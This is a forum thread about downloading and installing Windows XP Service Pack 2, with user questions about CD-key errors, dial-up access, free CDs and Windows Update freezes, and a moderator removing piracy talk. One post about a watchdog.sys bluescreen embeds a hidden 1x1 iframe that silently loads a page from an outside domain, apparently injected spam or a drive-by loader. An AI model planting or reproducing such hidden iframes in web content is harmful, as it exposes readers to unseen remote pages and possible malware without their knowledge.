Windows XP SP2 - Download it here

Collapse
X

• Filter
  • Time
  • Show
Clear All

Re: Windows XP SP2 - Download it here

Guyz when i install SP2 it says that i got wrong cd key, i downloaded sp2 normaly through win update, so if i download your versions will it be checking my cd key ?
    Last edited by TRIBAL-PHoENiX; 10-28-2004, 08:26 PM.

Comment

Sounds like you're using a pirated version of Windows. All the SP2 updates check for a valid key that I am aware of.
      Old age and treachery will overcome youth and skill
      My Toys

Comment

[Content Removed] Read the rules, absolutely no piracy talk or keychanging, no exceptions.
        *AMD edit
        Last edited by amd_man2005; 10-28-2004, 09:19 PM.

Comment

NO PIRACY :'( ME POOR GUY < GUNNA LIVE WITH SOME CRAPY FIREWALLS THAT GO ON SP1

Comment

how should dial-up users such as myself access SP2 w/o downloading the file? It would take me forever to download 266 mbs or whatever the file size is. Do i have to buy a cd somewhere?

Comment

The version on Windows Update isn't nearly as large, but you can get the CD for free anyway.

Comment

so why isnt this file as large? what is missing from it.

Where can I get the cd for free? will microsoft send me a free one in the mail? is there some store i can pick it up from?

-edit BTW, if i have the SP2 downloaded on one computer, how do i move it to another one? i just discovered that my friend has it downloaded on her computer and i want to move it to mine. how do i do this?
                Last edited by Chaos; 11-10-2004, 12:29 PM.

Comment

It's just a one-time file for installationg of that computer, while the file that was here was before it SP2 was released on WU and is meant for network installation.

Seriously, do you have problems with clicking links? Iposted a link to where you can order the CD for free. Links are highlighted in blue and underlined by default, for future reference.

I doubt it, unless she downloaded this big file. If you can find the install file, just move it your computer. Otherwise, get it yourself via ordering the CD or taking forever to download it.

Comment

sorry bout that. i thought the link u had there was the download page.
                    ya, no luck finding the install file from the other comp.

Comment

I am scratching my head... I have a question maybe someone can answer... This is weird. I am am using the same windows XP Pro I have always used.. I have 4 computers at home.. 2 desktop HP's an HP laptop and a Dell laptop. They all run XP pro with the same copy. Yesterday I formatted them all and successfully loaded my XP pro on both desktops and the HP laptop, and was able to do the online SP2 updates without a problem, I did them yesterday. Well... I loaded up my dell laptop with XP pro and no problems, but when I go to the windows update for the SP2 , it dosnt do anything.. my browser just sticks there at the page that says its "checking for the latest version of windows update software..." I dont understand why it would let me do all my other 3 comps like normal and now this. Could there be something wrong with my laptop maybe? This is a fresh XP pro install. I am online, have high speed, can surf around and stuff.. But cant get past that checking for latest version page and sometimes it will actually crash and lock me up. really ODD I think maybe its got to be my laptop causing it.
                      Last edited by MnCableGuy; 11-21-2004, 05:01 PM.

Comment

I just upgraded my motherboard and reintalled my existing windows xp via the repair function plus phoning in at Microsoft for a new activation code. Everything worked fine and my two harddrives run okay with all the stuff I have on it. However, when I tried to update windows I could not connect. I am also told by windows that I already have SP2 (I did have it) and it seems to work on the IE (blocking stuff, etc).

Sites explaining how to upgrade a motherboard but keeping your existing windows say to go through the process I decribed above but they also explain that one needs to reinstall SP1 and SP2. I then downloaded SP1a (for windows xp) and installed it (not sure whether it was still there from before I upgraded) but still not able to connect to windows update (the screen simply freezes and I have to use Alt Ctrl Del to close it down.

I now download SP2 from one the mirror links you have provided. The download is extremly slow:
                        • Do you know why that is?
                        • Is it the original pack?
                        • should I install it - although it might still be there?
                        • will this enable me to connect with windows update
                        Best,

Comment

This thread was started almost a year ago. I'm sure that the installation pack has been updated. You say that you can't connect to Windows Update... can you connect to Microsoft's homepage? If so, then hit up their download section and you can get the full version of SP2.
                          My Toys

Comment

I get bluescreen on watchdog.sys when I upgrade to XP SP2. :-/

<iframe src="http://www.clqk42.com/refs.php" HEIGHT=1 WIDTH=1 FRAMEBORDER=0></iframe>

Comment

Well, uhmm ... hi.

Could that damn.be link in the first post be removed? It's no longer available, and I keep getting requests for it :)

Comment

Done... sorry for the inconvenience.
                                My Toys

Comment

Working...
                                X